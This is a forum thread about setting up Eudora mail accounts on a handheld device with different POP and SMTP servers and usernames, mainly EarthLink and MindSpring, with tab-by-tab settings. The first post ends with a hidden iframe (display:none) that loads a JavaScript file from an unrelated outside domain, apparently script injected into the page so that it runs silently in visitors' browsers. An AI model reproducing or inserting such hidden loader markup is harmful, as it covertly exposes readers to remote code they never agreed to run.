eudora mail account question

is it possible to create a single mail account using two different e-mail servers and two different usernames?

i need to do the following in order to be able to use earthlink from my 7135:

pop server = pop.earthlink.net
pop username = joeschmoe

smtp server = smtpauth.earthlink.net
smtp username = joeschmoe@earthlink.net

both accounts use the same password, in case that makes a difference.

i've had difficulty getting this to work properly. pop works fine, but smtp seems to get some information from the account creation confused with my username.

thanks in advance!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Don't qualify the SMTP name. Add the domain in the second tab. Under the Security tab have SMTP set at best available & log on.

I hadn't thought of that.

To make things simple, i deleted 2 out of 3 of my accounts, and kept it to just one.

I un-qualified my login name on the first tab, and added the default domain on the second. It still doesn't work.

It asked me if it was ok to send my POP username and password when I told it to send the mail.

Hi,
What I did was similar I believe and effective:
I set my POP and SMTP to different servers (different domains too)
on the Basic tab. On the Security tab I set "best available" as Beryl mentions but I picked password prompt instead. At the first email I sent I was prompted for the user ID and password for the SMTP and provided a check box option to save it. (The POP credentials were what I entered on the Basic tab) and the mail was sent fine. Now the entry in Security says, "Password Saved"
My Default Domain is blank
Hope it helps.

that worked like a champ.

thanks apressman!

my first two accounts (both earthlink) are working great now.

i'm having trouble with my last one, though.

whenever it tries to send a message, i get the error that:

"an address has error: sender address is invalid"

and the message stays in my outbox. i'll play with this one some more now...

Although I rarely use Eudoramail now that I have Snappermail, I do use it for 2 situations. Both accounts work for sending mail but it took a little trial and error.

1. MINDSPRING (when I want to forward web pages from Eudoraweb)

Basic Tab
User name:
uid

Incoming Server (POP):
pop.mindspring.com

Outgoing Server (SMTP):
smtpauth.earthlink.net

Send Tab
Default domain:
mindspring.com

Security Tab

Incoming (POP)
Save Password checked
Authentication - Best Available
SSL - If Available

Security Tab
Outgoing (SMTP):
Authentication - Best Available, Password Saved
(I think it was originally "Password Prompt". )
SSL - If available
Server Info - "trust this certificate" checked (I don't know if that matters)

2. VTEXT (send immediate so I can get SMS replies to uid@vtext.com)

Basic Tab
User name:
uid@mindspring.com

Incoming Server (POP):
mail.mindspring.com

Outgoing Server (SMTP):
smtpauth.earthlink.net

Send Tab
Nothing

Security Tab

Incoming (POP)
Save Password checked
Authentication - Best Available
SSL - If Available

Security Tab
Outgoing (SMTP):
Authentication - Best Available, Same as Incoming
SSL - If available

HTH
